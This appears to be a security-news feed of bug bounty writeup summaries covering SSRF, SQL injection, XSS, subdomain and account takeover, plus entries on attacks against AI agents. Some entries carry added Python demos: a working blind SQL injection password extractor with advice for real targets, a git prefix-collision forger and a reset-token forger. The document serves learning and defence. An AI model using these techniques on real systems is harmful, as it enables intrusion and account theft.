Best Quality
0 8/10

A researcher discovered an SSRF vulnerability in Vimeo's file upload function by exploiting partial content transfer using HTTP Range headers. By manipulating redirect responses during the chunked file download process, they were able to retrieve sensitive Google Cloud metadata and API tokens.

Vimeo Sayed Abdelhafiz HackerOne Google Drive Google Cloud metadata.google.internal
medium.com · devanshbatham/Awesome-Bugbounty-Writeups · 18 hours ago · details
0 8/10

Technical writeup on exploiting SQL injection in INSERT/UPDATE queries when the application logic rejects commas: CASE WHEN expressions stand in for IF(a,b,c), LIKE comparisons stand in for comma-delimited SUBSTRING calls, and CAST is used for type coercion, giving a time-based blind injection with no comma anywhere in the payload. Includes a working payload and an automated Python exploit script.

Ahmed Sultan Redforce Web Security Detectify
blog.redforce.io · devanshbatham/Awesome-Bugbounty-Writeups · 18 hours ago · details
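Added example (not the writeup's own code or payload): a comma-free time-based blind extraction against a constructed SQLite database. Assumptions: the injectable value lands in an UPDATE string literal, the application rejects any value containing a comma, MySQL's SLEEP() is stood in for by a user-defined SQLite function, the splice is arithmetic (`'-( ... )-'`) so no CONCAT is needed, and a LIKE prefix test replaces SUBSTRING so that no comma is required. The table, column and password are constructed sample data.

```python
import sqlite3
import time

DELAY = 0.05                                      # seconds; kept small for the demo
CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"  # no '%' or '_' (LIKE wildcards)


def make_db():
    """Constructed sample database; SLEEP() is registered to mimic MySQL's."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("SLEEP", 1, lambda s: time.sleep(s) or 0)
    conn.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, nickname TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cr3tpw');
        INSERT INTO users VALUES (2, 'guest', 'guest');
    """)
    return conn


def vulnerable_update(conn, nickname):
    """Hypothetical profile update: rejects commas, then splices the value into an UPDATE."""
    if "," in nickname:
        raise ValueError("commas are not allowed")
    conn.execute(f"UPDATE users SET nickname='{nickname}' WHERE id=2")
    conn.commit()


def payload(prefix):
    """Comma-free boolean-to-time oracle spliced into the literal with '-( ... )-'.
    CASE WHEN replaces IF(a,b,c); a LIKE prefix test replaces SUBSTRING(x,n,1)."""
    return ("x'-(CASE WHEN (SELECT password FROM users WHERE id=1) LIKE '"
            + prefix + "%' THEN SLEEP(" + str(DELAY) + ") ELSE 0 END)-'")


def is_slow(conn, prefix):
    """True when the server paused, i.e. the admin password starts with `prefix`."""
    start = time.perf_counter()
    vulnerable_update(conn, payload(prefix))
    return time.perf_counter() - start > DELAY / 2


def extract_password(conn, max_len=32):
    """Extend the known prefix one character at a time. LIKE is case-insensitive
    here, so the charset is lowercase; on MySQL use LIKE BINARY for exact matching."""
    known = ""
    for _ in range(max_len):
        for ch in CHARSET:
            if is_slow(conn, known + ch):
                known += ch
                break
        else:                       # no character extended the prefix: done
            return known
    return known


if __name__ == "__main__":
    db = make_db()
    print("payload sample:", payload("s3"))
    print("recovered:", extract_password(db))
```

The prefix approach costs one query per candidate character per position, the same as the SUBSTRING form, and the only timing-sensitive line is the threshold in `is_slow`; on a real target, raise DELAY and repeat positive hits to filter network jitter.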
0 8/10

Security researchers discovered an SSRF vulnerability on Airbnb's chat endpoint by chaining a third-party open redirect in LivePerson's API with path traversal via encoded backslashes, enabling arbitrary requests from the Airbnb server. The attack exploited LivePerson's visitorWantsToChat redirect parameter and path parameter traversal to bypass intended API boundaries.

Airbnb LivePerson Ben Sadeghipour Brett Buerhaus
buer.haus · devanshbatham/Awesome-Bugbounty-Writeups · 18 hours ago · details
0 8/10

A detailed writeup of a multi-stage attack chain exploiting WAF bypass via DNS enumeration to discover origin server IP, leveraging LFI to bypass Cloudflare, then escalating to SSRF by bypassing Nginx web cache (using query string manipulation), and finally extracting AWS credentials from instance metadata. The attacker discovered that Nginx cache rules didn't account for query parameters, allowing cache bypass via appending '?' to metadata API calls.

Avinash Jain logicbomb Cloudflare AWS Nginx
medium.com · devanshbatham/Awesome-Bugbounty-Writeups · 18 hours ago · details
0 8/10
vulnerability

Researcher discovered a critical denial-of-service vulnerability in GitHub Actions: the 7-character abbreviated commit hashes that workflows pin actions to can be deliberately collided with, making the reference ambiguous and causing tarball resolution failures that break every build using that action at the short hash. The researcher accidentally triggered a global outage while demonstrating the attack.

GitHub Actions Teddy Katz actions/docker 76ff57a 76ff57a6c3d817840574a98950b0c7bc4e8a13a8 76ff57aa21370794040cd0caafd84d8a7aa0927c
blog.teddykatz.com · devanshbatham/Awesome-Bugbounty-Writeups · 18 hours ago · details
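Added example (not the researcher's code or GitHub's resolver): how cheap a prefix collision on an abbreviated git object id is, and what a resolver must do when a prefix matches more than one object. Assumptions: blobs are used instead of commits because their id is just sha1("blob <size>\0" + content), which is enough to show the ambiguity; the prefix length is 4 hex digits so the search finishes instantly (7 digits, git's default abbreviation, is about 2**28 hashes).

```python
import hashlib
import itertools
from typing import Iterable, Optional


def git_blob_id(content: bytes) -> str:
    """Object id git assigns to a blob: sha1(b"blob <size>\\0" + content)."""
    return hashlib.sha1(b"blob %d\x00" % len(content) + content).hexdigest()


def forge_prefix_collision(target_id: str, prefix_len: int, base: bytes = b"") -> bytes:
    """Search for blob content whose id shares the first prefix_len hex digits of
    target_id but is a different object. Expected cost ~16**prefix_len hashes:
    4 digits is instant, 7 digits (git's default abbreviation) is ~2**28."""
    want = target_id[:prefix_len]
    for nonce in itertools.count():
        candidate = base + b"\n# nonce %d\n" % nonce   # appended trailer varies the hash
        object_id = git_blob_id(candidate)
        if object_id.startswith(want) and object_id != target_id:
            return candidate


def resolve_abbrev(abbrev: str, known_ids: Iterable[str]) -> Optional[str]:
    """Resolver behaviour for an abbreviated id: return the full id only when exactly
    one known object matches; None for zero or several matches (ambiguous)."""
    matches = [oid for oid in known_ids if oid.startswith(abbrev)]
    return matches[0] if len(matches) == 1 else None


if __name__ == "__main__":
    base = b"FROM alpine:3.19\n"                      # constructed sample content
    target = git_blob_id(base)
    forged = forge_prefix_collision(target, 4, base)
    print("target ", target)
    print("forged ", git_blob_id(forged))
    print("resolve", target[:4], "->", resolve_abbrev(target[:4], [target, git_blob_id(forged)]))
```

The defensive conclusion for workflow authors is the one the writeup reaches: pin actions to the full 40-hex id, since only a full id is immune to a later object making the prefix ambiguous.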
0 8/10

Technical writeup demonstrating how to identify and exploit 55,000+ subdomain takeover vulnerabilities on Shopify by analyzing CNAME records pointing to Shopify's infrastructure, including two exploitation methods (application name mapping and DNS mapping) with step-by-step methodology and large-scale scanning techniques.

Shopify buckhacker FDNS Dataset Project Sonar HackerOne
medium.com · devanshbatham/Awesome-Bugbounty-Writeups · 18 hours ago · details
0 8/10

Researcher demonstrates escalation of a subdomain takeover on impact.postmates.com (GitHub pages vulnerability) into session cookie theft by leveraging document.domain relaxation in the parent domain postmates.com, enabling account takeover despite the subdomain being out-of-scope. The technique exploits the fact that if the main domain explicitly sets document.domain, a compromised subdomain can set it to match and access sensitive cookies via JavaScript.

Postmates HackerOne Synack impact.postmates.com raster-static.postmates.com GitHub
blog.takemyhand.xyz · devanshbatham/Awesome-Bugbounty-Writeups · 18 hours ago · details
0 8/10

A researcher found a four-request CSRF chain in a user management system's CSV import feature that allowed account takeover and escalation to system admin: a logged-in administrator could be made to upload a malicious CSV and complete the import without any credentials on the attacker's side. None of the four endpoints (file upload, job view, verification, and submission) carried CSRF tokens, and the exploit had to respect the timing delays between import steps.

HackerOne A Bug'z Life
medium.com · devanshbatham/Awesome-Bugbounty-Writeups · 18 hours ago · details
0 8/10

Steam Inventory Helper Chrome extension v1.13.6 suffered from a DOM-based XSS in bookmarks.html combined with clickjacking via over-permissive web_accessible_resources, allowing arbitrary JavaScript execution in the extension's privileged context and hijacking of any site the user is authenticated to. The vulnerability exploits jQuery's unsafe DOM manipulation APIs (html/append) paired with an unsafe-eval CSP directive, weaponized through UI redressing to trick users into pasting XSS payloads.

Steam Inventory Helper Matthew Bryant Chrome
thehackerblog.com · devanshbatham/Awesome-Bugbounty-Writeups · 18 hours ago · details
0 8/10
vulnerability

XSS vulnerability in a conferencing application that chains to RCE through Node.js process execution in the native OS X client. The exploit uses String.fromCharCode to bypass quote filtering and jQuery's $.getScript() to fetch and execute remote code that spawns arbitrary processes.

ActBlue RSnake patrick ben greg GitHub Node jQuery String.fromCharCode process.open xor.cc
matatall.com · devanshbatham/Awesome-Bugbounty-Writeups · 18 hours ago · details
0 8/10

PortSwigger researchers discovered a practical XSS exploitation technique for hidden input fields using the accesskey attribute combined with onclick events, which works across modern browsers including Firefox and Chrome by triggering payload execution via keyboard shortcuts (ALT+SHIFT+X on Windows, CTRL+ALT+X on macOS).

PortSwigger Burp Suite Gareth Heyes Liam
portswigger.net · devanshbatham/Awesome-Bugbounty-Writeups · 18 hours ago · details
0 8/10

XSS vulnerability in dynamically generated PDF endpoint where unsanitized user input (utrnumber parameter) is rendered as HTML/JavaScript in PDFs, allowing arbitrary JavaScript execution under file:// origin and enabling local file read via XMLHttpRequest to access /etc/passwd.

Rahul Maini Bugcrowd xyz.com
noob.ninja · devanshbatham/Awesome-Bugbounty-Writeups · 18 hours ago · details
0 8/10

Multiple DOM-based XSS vulnerabilities discovered in iframe buster implementations from major ad tech vendors (Adform, Eyeblaster, Adtech) due to weak regex and whitelist validation on user-controlled parameters, allowing attackers to inject arbitrary JavaScript on top-tier publisher sites.

Randy Westergren Adform Eyeblaster Adtech Google DoubleClick CNN Fandango Forbes
randywestergren.com · devanshbatham/Awesome-Bugbounty-Writeups · 18 hours ago · details
0 8/10

A company was compromised by chaining an IDOR vulnerability in a support ticket API with a blind XSS vulnerability in the internal ticket management system. The attacker leveraged blind XSS to extract ticket IDs (which were otherwise hard to brute-force), then used IDOR to access a password reset ticket from Slack that contained registration links to company channels.

Inti De Ceukelaire Harsh Jaiswal XSS Hunter Slack Facebook Workplace
ansariosama.com · devanshbatham/Awesome-Bugbounty-Writeups · 18 hours ago · details
0 8/10

A stored XSS vulnerability in webcomponents.org allowed attackers to inject malicious JavaScript via repository homepage URLs, enabling theft of GitHub OAuth authorization codes and account hijacking to star repositories on behalf of authenticated users.

webcomponents.org GitHub Thomas Orlita Polymer
websecblog.com · devanshbatham/Awesome-Bugbounty-Writeups · 18 hours ago · details
0 8/10
vulnerability

An XSS vulnerability in Google Code-in exploited improper escaping of user input within JSON data embedded in script tags, where the </script> sequence in user comments terminated the script element prematurely, allowing payload execution. The vulnerability was further exploited via AngularJS template injection ({{1-1}}) to bypass the Content Security Policy.

Google Code-in Google VRP AngularJS Thomas Orlita
websecblog.com · devanshbatham/Awesome-Bugbounty-Writeups · 18 hours ago · details
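Added example (not the writeup's code or Google's template): the same failure mode in a generic server-side template that embeds JSON inside a script element, with the output encoding that prevents it. Assumptions: the page is built with a hypothetical `<script>var state = ...;</script>` template and Python's json.dumps; the comment text is constructed. The point is that JSON escaping and HTML escaping are different layers: the HTML tokenizer ends the script element at the first `</script` it sees, whatever the JavaScript string context.

```python
import json
import re

TEMPLATE = "<script>var state = {json};</script>"   # hypothetical page template


def embed_unsafe(data) -> str:
    """json.dumps() yields valid JSON but does not escape '<' or '>', so a string
    value containing '</script>' closes the script element for the HTML parser."""
    return TEMPLATE.format(json=json.dumps(data))


def embed_safe(data) -> str:
    """Same JSON, but '<', '>' and '&' are emitted as \\uXXXX escapes. The HTML
    parser never sees a tag; JS decodes the escapes back, so the data is unchanged."""
    s = json.dumps(data)                 # ensure_ascii=True already escapes non-ASCII
    s = s.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")
    return TEMPLATE.format(json=s)


def script_close_tags(html: str) -> int:
    """Number of '</script' sequences in the markup: more than one means a breakout."""
    return len(re.findall(r"</script", html, flags=re.IGNORECASE))


def embedded_json(html: str) -> str:
    """Recover the JSON text between 'var state = ' and the final ';</script>'."""
    head, tail = "<script>var state = ", ";</script>"
    return html[len(head):-len(tail)]


def roundtrip_ok(data) -> bool:
    """The escaped form still parses to exactly the original data."""
    return json.loads(embedded_json(embed_safe(data))) == data


if __name__ == "__main__":
    comment = {"comment": "</script><script>alert(1)</script>"}   # constructed input
    print(embed_unsafe(comment))
    print(embed_safe(comment))
```

The AngularJS `{{1-1}}` step in the writeup is a second, independent problem: once markup lands in an Angular-compiled region, template expressions run without any inline script, which is why a CSP that only forbids inline script does not stop it.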
0 8/10

A creative XSS exploitation technique that transforms a reflected/stored XSS vulnerability in Swisscom's Bluewin webmail into a self-propagating worm via malicious attachment filenames. The worm leverages unescaped angle brackets in attachment metadata to inject JavaScript that can automatically enumerate and send itself to other users' contacts.

Swisscom Bluewin webmail.bluewin.ch rich-v01.bluewin.ch Nicolas Heiniger Alexandre Florian BlackAlps
blog.compass-security.com · devanshbatham/Awesome-Bugbounty-Writeups · 18 hours ago · details
0 8/10

Jonathan Bouman discovered a persistent XSS vulnerability in LinkedIn's article embed feature by exploiting unvalidated Open Graph tags, specifically the og:video tag, to inject malicious HTML and create fake phishing login screens that could steal user credentials. The vulnerability leverages LinkedIn's content embedding functionality which processes Open Graph metadata without proper validation, allowing attackers to inject arbitrary content into iframes on LinkedIn articles.

Jonathan Bouman LinkedIn YouTube Medium Twitter Vimeo Wordpress SnappySnippet Burp Suite
medium.com · devanshbatham/Awesome-Bugbounty-Writeups · 18 hours ago · details
0 8/10

A reflected XSS vulnerability on Amazon's masclient endpoint (/gp/masclient/dp/) allows attackers to inject arbitrary HTML/JavaScript by exploiting insufficient input validation and capitalization of product IDs. The author demonstrates cookie theft and session hijacking via SVG onload attributes with HTML entity encoding to bypass browser XSS protections.

amazon.com Jonathan Bouman Scroll.am Vue.js AWS Codestar AWS Lambda Chrome XSS Auditor Firefox jscrew.it jjencode
medium.com · devanshbatham/Awesome-Bugbounty-Writeups · 18 hours ago · details
0 8/10

A reflected XSS vulnerability was discovered on Philips.com through enabled Adobe Experience Manager debug mode in production, allowing HTML injection via the debug=layout parameter. The attack bypassed ModSecurity and Akamai WAF by using a <body onpointerenter> tag combined with jQuery.getScript() to load external JavaScript, enabling phishing and credential theft from authenticated users.

Philips Adobe Experience Manager ModSecurity AkamaiGHost WhatWaf WhatCMS.org Aquatone Janrain Jonathan Bouman jQuery
medium.com · devanshbatham/Awesome-Bugbounty-Writeups · 18 hours ago · details
0 7/10

Unpacker is a modular malware packer detection and unpacking tool that automatically identifies packers (UPX, ASPack, Themida, VMProtect, MPRESS) via signatures, entropy, and heuristics, then dispatches to the appropriate unpacker module—native decompression for UPX, emulation-based unpacking via Unicorn/Qiling for others—with built-in validation using string analysis and file metadata.

Unpacker Andrey Pautov InfoSec Write-ups UPX ASPack Themida VMProtect MPRESS Unicorn Unipacker Qiling String Analyzer fileinfo.py
infosecwriteups.com · Andrey Pautov · 1 hour ago · details
0 7/10

A comprehensive guide to static malware analysis workflow covering triage, string analysis, PE import analysis, and unpacking, with open-source tools and an orchestrator for automation. The article explains each step's purpose and how to execute the full workflow programmatically.

Andrey Pautov InfoSec Write-ups Basic-File-Information-Gathering-Script String-Analyzer PE-Import-Analyzer Static Malware Analysis Orchestrator VirusTotal
infosecwriteups.com · Andrey Pautov · 1 hour ago · details
0 7/10

A multi-stage Qualcomm GBL exploit chain allows bootloader unlocking on Snapdragon 8 Elite Gen 5 devices by leveraging an unsigned code execution vulnerability in the efisp partition, combined with a fastboot command injection flaw that disables SELinux enforcement, and OEM-specific vulnerabilities (Xiaomi's Hyper OS MQSAS service) to bypass strict bootloader unlock restrictions.

Qualcomm GBL (Generic Bootloader Library) Xiaomi 17 OnePlus 15 Galaxy S26 Ultra Redmi K90 Pro Max POCO F8 Ultra Hyper OS MQSAS (MIUI Quality Service and Secure) Snapdragon 8 Elite Gen 5 Android 16 Roger Ortiz
androidauthority.com · ledoge · 8 hours ago · details · hn
0 7/10
research

A 2-week empirical study of six autonomous AI agents with real tools (email, shell, persistent storage) tested by 20 researchers in both benign and adversarial scenarios, documenting 10 security vulnerabilities (prompt injection, identity spoofing, non-owner compliance, social engineering bypass) and 6 cases of emergent safety behavior including cross-agent safety coordination without explicit instruction.

Natalie Shapira OpenClaw Kimi K2.5 Claude Opus 4.6 ProtonMail Discord GitHub Ash Flux Jarvis Quinn Mira Doug
agentsofchaos.baulab.info · xdotli · 13 hours ago · details · hn
0 7/10

Security researchers from Irregular found that LLM-generated passwords from Claude, ChatGPT, and Gemini are fundamentally weak because of predictable patterns, with effective entropy of roughly 20 to 27 bits instead of the 98-120 bits expected from truly random passwords. This allows them to be brute-forced in hours rather than centuries, despite appearing strong to standard password checkers.

Irregular Claude ChatGPT Gemini OpenAI Google Anthropic Dario Amodei HackerOne 1Password Bitwarden GitHub
theregister.com · pabs3 · 14 hours ago · details · hn
0 7/10

This article explores how dependent type systems in Lean 4 can serve as executable specifications, allowing AI-generated code to be verified as correct by the compiler rather than through traditional testing. The author demonstrates this with a worked example of AI-generated sorting implementations where the type signature itself encodes the correctness proof.

Lean 4 Claude Curry-Howard correspondence IEEE
ngrislain.github.io · ngrislain · 18 hours ago · details · hn
0 7/10

A researcher discovered an account takeover vulnerability in a login-with-OTP system by exploiting loose coupling between email and OTP validation. By changing the email parameter in the /login/signin POST request to a victim's email while using a valid OTP sent to the attacker's email, they could gain unauthorized access to any user account.

Avanish Pathak
avanishpathak46.medium.com · kh4sh3i/bug-bounty-writeups · 18 hours ago · details
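Added example (not the writeup's code or the target's backend): a minimal OTP login service with the flaw described above beside a corrected check. Assumptions: the hypothetical `/login/signin` handler receives `email` and `otp` fields, the vulnerable version only verifies that the OTP is currently valid for some account and then trusts the email in the request, and the fixed version looks the OTP up by the email it was issued to, compares in constant time, limits guesses and burns the code after one use. All mailboxes and codes are constructed.

```python
import hmac
import secrets
import time


class OtpLogin:
    """Constructed OTP login backend; both validators share the same issuance."""

    MAX_ATTEMPTS = 5

    def __init__(self, ttl_seconds: int = 300):
        self.ttl = ttl_seconds
        self._issued = {}            # email -> {"code", "expires", "attempts"}

    def issue(self, email: str) -> str:
        """Generate a 6-digit code and record which email it was sent to."""
        code = f"{secrets.randbelow(10**6):06d}"
        self._issued[email] = {"code": code, "expires": time.time() + self.ttl, "attempts": 0}
        return code

    def _live(self, entry) -> bool:
        return entry is not None and entry["expires"] > time.time()

    def login_vulnerable(self, email: str, code: str):
        """Bug: validates that `code` is a live OTP for *some* account, then signs in
        the `email` from the request. An attacker requests an OTP for their own
        mailbox and submits it together with the victim's email."""
        for entry in self._issued.values():
            if self._live(entry) and entry["code"] == code:
                return email
        return None

    def login_fixed(self, email: str, code: str):
        """Fix: the OTP is bound to the email it was issued for."""
        entry = self._issued.get(email)
        if not self._live(entry):
            return None
        entry["attempts"] += 1
        if entry["attempts"] > self.MAX_ATTEMPTS:
            del self._issued[email]                     # too many guesses: invalidate
            return None
        if not hmac.compare_digest(entry["code"], code):
            return None
        del self._issued[email]                         # single use
        return email


if __name__ == "__main__":
    svc = OtpLogin()
    attacker_code = svc.issue("attacker@example.test")
    print("vulnerable:", svc.login_vulnerable("victim@example.test", attacker_code))
    print("fixed:     ", svc.login_fixed("victim@example.test", attacker_code))
```

The guess cap matters once the binding is fixed: a 6-digit code bound to the right email is still only 10**6 possibilities, so without a limit the attacker simply moves from swapping the email to brute-forcing the code.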
0 7/10

Technical writeup demonstrating SQL injection bypass of a ModSecurity WAF using MySQL version-conditional comments (/*!50000 ... */) and alternative payload construction with MOD/DIV operators and variable assignment to extract WordPress database credentials and schema information.

_Y000_
infosecwriteups.com · kh4sh3i/bug-bounty-writeups · 18 hours ago · details
0 7/10

A bug bounty hunter documents their journey discovering a time-based blind SQL injection vulnerability in a sorting parameter by using MySQL version detection via comment syntax to narrow payload scope, ultimately bypassing WAF filters with the payload (select*from(select(sleep(10)))a) and earning a $3500 bounty.

Marx Chryz Del Mundo RootCon Bugcrowd Web Application Hacker's Handbook Web Hacking 101 Stök Farah Hawa Jason Haddix Peter Yaworski James Kettle Dafydd Stuttard
marxchryz.medium.com · kh4sh3i/bug-bounty-writeups · 18 hours ago · details
0 7/10

A bug bounty writeup demonstrating account takeover by combining IDOR with an unauthenticated, reversible token scheme in a password reset function. The attacker decompressed the zlib-encoded tokens, found that the only integrity constraint was zlib's own Adler-32 checksum, located a Transaction_Token endpoint via directory fuzzing, and automated exploitation to forge valid password reset links for arbitrary accounts.

Mayank Pandey CyberChef Zlib Adler-32 Python
mayank-01.medium.com · kh4sh3i/bug-bounty-writeups · 18 hours ago · details
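Added example (not the writeup's script or the target's token format): why a zlib-wrapped token is forgeable and what the Adler-32 "constraint" actually is. Assumptions: the token is base64(zlib(JSON)) carrying a user id and expiry, with no signature; the fix appends an HMAC under a server-side key. Zlib's trailer is the Adler-32 of the plaintext, so patching bytes inside the compressed stream fails the check, but decompress, edit, recompress produces a fresh valid trailer for free. The ids, expiry and key are constructed.

```python
import base64
import hashlib
import hmac
import json
import zlib

SECRET_KEY = b"constructed-demo-key"   # assumption: server-side key the fix would use


def issue_token(uid: int, expires: int) -> str:
    """Assumed vulnerable layout: base64(zlib(JSON)), nothing authenticates it."""
    body = json.dumps({"uid": uid, "exp": expires}).encode()
    return base64.urlsafe_b64encode(zlib.compress(body)).decode()


def decode_token(token: str) -> dict:
    return json.loads(zlib.decompress(base64.urlsafe_b64decode(token)))


def trailer_is_valid(token: str) -> bool:
    """A zlib stream ends with the big-endian Adler-32 of the plaintext; decompress
    refuses the stream when it does not match, so byte-patching the stream fails."""
    stream = base64.urlsafe_b64decode(token)
    try:
        plain = zlib.decompress(stream)
    except zlib.error:
        return False
    return int.from_bytes(stream[-4:], "big") == zlib.adler32(plain)


def flip_last_byte(token: str) -> str:
    """Naive tampering: corrupt one byte of the compressed stream (or the HMAC tag)."""
    raw = bytearray(base64.urlsafe_b64decode(token))
    raw[-1] ^= 0xFF
    return base64.urlsafe_b64encode(bytes(raw)).decode()


def forge_token(token: str, new_uid: int) -> str:
    """Decompress, edit, recompress: zlib recomputes Adler-32, so the check passes."""
    data = decode_token(token)
    data["uid"] = new_uid
    return base64.urlsafe_b64encode(zlib.compress(json.dumps(data).encode())).decode()


def issue_token_fixed(uid: int, expires: int) -> str:
    """Fix: authenticate the compressed body with HMAC-SHA256 under a server key."""
    body = zlib.compress(json.dumps({"uid": uid, "exp": expires}).encode())
    tag = hmac.new(SECRET_KEY, body, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(body + tag).decode()


def decode_token_fixed(token: str):
    """Returns the claims, or None when the tag does not verify."""
    raw = base64.urlsafe_b64decode(token)
    body, tag = raw[:-32], raw[-32:]
    if not hmac.compare_digest(tag, hmac.new(SECRET_KEY, body, hashlib.sha256).digest()):
        return None
    return json.loads(zlib.decompress(body))


if __name__ == "__main__":
    t = issue_token(1001, 1700000000)              # constructed sample token
    print("original:", decode_token(t))
    print("forged:  ", decode_token(forge_token(t, 1)))
    print("fixed, tampered:", decode_token_fixed(flip_last_byte(issue_token_fixed(1001, 1700000000))))
```

Adler-32 is a checksum against accidental corruption, not a MAC; anything the client can recompute without a secret gives the attacker no obstacle, which is the gap the HMAC closes.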